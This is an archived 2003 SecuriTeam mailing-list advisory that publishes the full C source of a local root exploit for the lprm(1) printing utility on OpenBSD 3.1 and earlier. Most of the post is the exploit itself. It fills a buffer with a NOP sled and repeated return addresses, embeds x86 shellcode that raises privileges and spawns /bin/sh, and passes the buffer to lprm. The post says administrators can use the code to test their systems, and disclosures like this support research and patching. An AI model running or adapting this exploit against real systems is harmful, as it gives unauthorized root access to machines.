[EXPL] OpenBSD lprm(1) Exploit

From: support@securiteam.com
Date: 03/09/03

Next message: support@securiteam.com: "[NEWS] Clearswift MAILsweeper MIME Attachment Evasion Issue"

Previous message: support@securiteam.com: "[NEWS] Implementation Flaws in Adobe Document Server for Reader Extensions"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

From: support@securiteam.com
To: list@securiteam.com
Date: 9 Mar 2003 16:02:33 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

In the US?

Contact Beyond Security at our new California office
housewarming rates on automated network vulnerability
scanning. We also welcome ISPs and other resellers!

Please contact us at: 323-882-8286 or ussales@beyondsecurity.com
- - - - - - - - -

OpenBSD lprm(1) Exploit
------------------------------------------------------------------------

SUMMARY

A vulnerability in OpenBSD's lprm has been found to allow gaining of
elevated privileges (root), the following is an exploit code that can be
used by administrators to test their system for the vulnerability.

DETAILS

Vulnerable systems:
* OpenBSD version 3.1 and prior

Exploit:
/*
* lprmexp.c
*
* OpenBSD <= 3.1 lprm(1) local root exploit
*
* By CMN <cmn@darklab.org>/<md0claes@mdstud.chalmers.se>
*
* Tested on OpenBSD 3.0 and 3.1.
*
* Fiddle with -a option from 1 to 7 to indent address in
* buffer.
*
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <sys/types.h>

#define LPRMPROG "/usr/bin/lprm"
#define BUFSIZE 511
#define OFFSET 0
#define NOP 0x90

static char obsdcode[] =
    "\x31\xc0" /* xorl %eax, %eax */
    "\x50" /* pushl %eax */
    "\x50" /* pushl %eax */
    "\xb0\xb7" /* movb $0xb7, %al */
    "\xcd\x80" /* int $0x80 */
    "\x31\xc0" /* xorl %eax, %eax */
    "\xb0\x19" /* movb $0x19, %al */
    "\x50" /* pushl %eax */
    "\xcd\x80" /* int $0x80 */
    "\x50" /* pushl %eax */
    "\x50" /* pushl %eax */
    "\x31\xc0" /* xorl %eax, %eax */
    "\xb0\x17" /* movb $0x17, %al */
    "\xcd\x80" /* int $0x80 */
    "\x31\xc0" /* xorl %eax, %eax */
    "\xb0\x2b" /* movb $0x2b, %al */
    "\x50" /* pushl %eax */
    "\xcd\x80" /* int $0x80 */
    "\x50" /* pushl %eax */
    "\x50" /* pushl %eax */
    "\x31\xc0" /* xorl %eax, %eax */
    "\xb0\xb5" /* movb $0xb5, %al */
    "\xcd\x80" /* int $0x80 */
    "\x31\xc0" /* xorl %eax, %eax */
    "\x50" /* pushl %eax */
    "\x68\x2f\x2f\x73\x68" /* pushl $0x68732f2f */
    "\x68\x2f\x62\x69\x6e" /* pushl $0x6e69622f */
    "\x89\xe3" /* movl %esp, %ebx */
    "\x50" /* pushl %eax */
    "\x53" /* pushl %ebx */
    "\x89\xe2" /* movl %esp, %edx */
    "\x50" /* pushl %eax */
    "\x52" /* pushl %edx */
    "\x53" /* pushl %ebx */
    "\x50" /* pushl %eax */
    "\xb0\x3b" /* movb $0x3b, %al */
    "\xcd\x80" /* int $0x80 */
    "\x31\xc0" /* xorl %eax, %eax */
    "\x40" /* inc %eax */
    "\x50" /* pushl %eax */
    "\x50" /* pushl %eax */
    "\xcd\x80"; /* int $0x80 */

u_long
getesp(void)
{
__asm__("movl %esp, %eax");
}

void
usage(u_char *pname)
{
    printf("\n** OpenBSD lprm(1) local root exploit by CMN **\n");
    printf("\nUsage: %s printer [-o offs] [-r ret] [-a indent]\n\n",
        pname);
}

int
main(int argc, char *argv[])
{
    int i;
    u_char indent = 0;
    u_long raddr = 0;
    u_long offset = 0;
    u_char buf[BUFSIZE+1];

    if (argc < 2) {
        usage(argv[0]);
        exit(1);
    }

argc--;
argv++;

    while ( (i = getopt(argc, argv, "a:r:o:")) != -1) {
        switch (i) {
            case 'a':
                indent = atoi(optarg) % 8;
                break;

            case 'r':
                raddr = strtoul(optarg, NULL, 0);
                break;

            case 'o':
                offset = strtoul(optarg, NULL, 0);
                break;

            default:
                exit(1);
                break;
        }
    }

    if (!raddr) {
        raddr = getesp();
        raddr -= offset ? offset : OFFSET;
    }
    else
        raddr -= offset;

printf("Using address 0x%08x\n", raddr);

    memset(buf, NOP, BUFSIZE);
    memcpy(&buf[BUFSIZE-(indent+4)], &raddr, sizeof(raddr));
    memcpy(&buf[BUFSIZE-(indent+8)], &raddr, sizeof(raddr));
    memcpy(&buf[BUFSIZE-(indent+12)], &raddr, sizeof(raddr));
    memcpy(&buf[BUFSIZE-(indent+16)], &raddr, sizeof(raddr));
    memcpy(&buf[BUFSIZE-(indent+20)], &raddr, sizeof(raddr));
    memcpy(&buf[BUFSIZE-(indent+24)], &raddr, sizeof(raddr));
    memcpy(&buf[BUFSIZE]-(strlen(obsdcode)+100),
            obsdcode, strlen(obsdcode));
    buf[BUFSIZE] = '\0';

execlp(LPRMPROG, "CMN", "-P", argv[0], buf, buf, NULL);
exit(1);
}

ADDITIONAL INFORMATION

The information has been provided by <mailto:cmn@darklab.org> CMN.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Next message: support@securiteam.com: "[NEWS] Clearswift MAILsweeper MIME Attachment Evasion Issue"

Previous message: support@securiteam.com: "[NEWS] Implementation Flaws in Adobe Document Server for Reader Extensions"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Relevant Pages

[Full-disclosure] SEC Consult SA-20120328-1 :: Microsoft ASP.NET Forms Authentication By
... SEC Consult Vulnerability Lab Security Advisory ... vulnerable version: Microsoft .NET Framework Version:4.0.30319; ... The unicode string length is determined ... checkForNull, bool checkIfEmpty, bool checkForCommas, int maxSize) { ...
(Full-Disclosure)
[EXPL] Apache Multiple Space Header DoS (Multi-Threaded Exploit)
... The exploit code below is another version of the Apache 2.0.52 DoS ... vulnerability published previously here: ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
(Securiteam)
[NT] JBoot Password Bypassing Vulnerability
... housewarming rates on automated network vulnerability ... Place any Windows Startup Floppy ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
(Securiteam)
[EXPL] Suid Application Execution May Give Local Root (Exploit Code)
... It is possible for a local user under the FreeBSD operating system to ... For more information about the vulnerability please see: ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
(Securiteam)
[NT] Texis Sensitive Information Leak
... housewarming rates on automated network vulnerability ... The Texis program executes files written in Texis Web Script (a.k.a. ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
(Securiteam)